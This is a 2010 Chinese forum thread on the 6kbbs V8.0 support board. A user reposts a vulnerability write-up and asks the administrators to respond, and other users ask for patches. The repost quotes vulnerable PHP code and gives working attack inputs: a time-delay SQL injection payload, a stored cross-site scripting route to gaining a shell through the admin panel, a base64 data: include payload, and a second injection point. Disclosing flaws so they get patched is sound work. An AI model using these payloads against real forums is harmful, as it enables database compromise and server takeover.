热搜:6KBBS6kbbs V8.0 官方论坛
当前位置: 6kbbs V8.0 官方论坛 » 使用问题 » 6kbbs v8.0论坛两个漏洞?
帖子状态  
本帖子共有 3021 位阅读者, 6 个回复.
  • 回复
7条记录

liguiyan

小学生
帖子
12 
金钱
26 
魅力
26 
威望
26 
注册
2010-11-04 
liguiyan 发表于 2010-11-13 15:51   
6kbbs v8.0论坛两个漏洞?
原文地址:http://www.7747.net/Article/201011/78131.html
我是菜鸟,不能理解他讲的东西,管理员在吗?希望能看一下。
1. 延迟注射:
ajaxmember.php?action=deleteMsgs 80行
case "deleteMsgs":
$msgids=$_POST['msgids'];
   //DELETE
   if(is_array($msgids)) {
    $delids=implode(",",$msgids);
    echo "id in ($delids) and touserid={$lg['userid']}";
   $db->row_delete("msgs","id in ($delids) and touserid={$lg['userid']}"); //可惜了,是deleted语句,无论结果,只返回 _Y_
   }
   succeedFlag();
break;
没有错误输出,被迫采用延迟的方法:POST一个 msgids[a]=if(1,sleep(10),1) 进入数据库。

操作语句是:DELETE FROM `db_msgs` WHERE id in ( if(1,sleep(10),1) ) and touserid=1
系统采用md5(username.userpass)的方式。Exp:


2. 论坛跨站:
ajaxmember.php 34行 设置论坛个人信息:
case "modifyDetails":
$user = $_POST['user']; //接收的user数组没有进行htmlspecialchars
   if(getPopedom(5)==0){
    $user['usertitle']='';
   }
   if($user["email"]==""){
    exit("资料不完整。");
   }
   foreach(explode(",", $cache_settings['reservedkeyword']) as $rkey){
    if(!empty($rkey) && stristr($user['usertitle'],$rkey)){
     exit("自定义头衔含有禁用关键字");
    }
   }
$db->row_update("users",$user,"id={$lg['userid']}"); //存入数据库,函数内SQL有单引号包裹
   succeedFlag();
论坛帖子对输出进行了XSS过滤,个人签名等XSS点无法使用。突破点在后台管理编辑用户的地方,所以比较鸡肋。不过系统后台拿shell方法较多,直接编辑脚本即可,利用方法:
注册用户,修改个人信息,装嫩让管理后台编辑你的用户,拿shell。
利用ajax操作后台的js:
http://www.uudisc.com/user/k4shifz/file/3665675

再简单说一下后台:
后台漏洞比较多,编辑脚本拿shell、本地包含,注入,还有个远程包含:
admin\admin.php
......
$inc=strFilter($_GET['inc']);
$action=strFilter($_GET['action']);
......
$inc=str_replace('.','',$inc);echo $inc;
require_once($inc.".php"); //远程包含,可惜在后台
/admin/admin.php?inc=data:;base64,PD9waHAgZWNobyBwaHBpbmZvKCk7Pz4=     //phpinfo()
5.2.0以后受制于allow_url_include
捡一个注入:
ajaxadmin.php
case "dotopics":
   try{
    $postaction=$_POST['postaction'];
    $tids=$_POST['tids'];
    if(empty($tids)){
     echo("没有选中帖子。");
     return;
    }
    if(is_array($tids)) {
     $tidstr=implode(",",$tids);
     switch($postaction){
     
      case "delPost":
       $db->row_delete("posts","tid in ({$tidstr}) and fid={$fid}"); //进入数据库查询
发布作者:k4shifz,由情整理编辑

瑶哥

初中生
帖子
23 
金钱
85 
魅力
33 
威望
33 
注册
2006-12-02 
瑶哥 发表于 2010-11-13 21:07   
RE:6kbbs v8.0论坛两个漏洞?
不懂。。。。。。
瑶哥的博客
http://yaoge.me/

lvgo520

幼儿园
帖子
金钱
11 
魅力
11 
威望
11 
注册
2010-08-15 
lvgo520 发表于 2010-11-14 03:17   
RE:6kbbs v8.0论坛两个漏洞?
管理员给个话啊,我们也好下楼主的东西打补丁啊

瑶哥

初中生
帖子
23 
金钱
85 
魅力
33 
威望
33 
注册
2006-12-02 
瑶哥 发表于 2010-11-14 10:54   
RE:6kbbs v8.0论坛两个漏洞?
管理员,要么是不在,要么是在确认是否存在这个漏洞,又或是在想着怎么解决!
瑶哥的博客
http://yaoge.me/

xipick

高中生
帖子
62 
金钱
80 
魅力
80 
威望
80 
头衔
嘻皮客网站长 
注册
2010-10-21 
xipick 发表于 2010-11-15 22:28   
RE:6kbbs v8.0论坛两个漏洞?
www.xipick.com嘻皮客网帮顶起

lvgo520

幼儿园
帖子
金钱
11 
魅力
11 
威望
11 
注册
2010-08-15 
lvgo520 发表于 2010-11-22 03:31   
RE:6kbbs v8.0论坛两个漏洞?
88888888888888888888

lvgo520

幼儿园
帖子
金钱
11 
魅力
11 
威望
11 
注册
2010-08-15 
lvgo520 发表于 2010-11-25 03:35   
RE:6kbbs v8.0论坛两个漏洞?
官方怎么没有反映啊
  • 回复
7条记录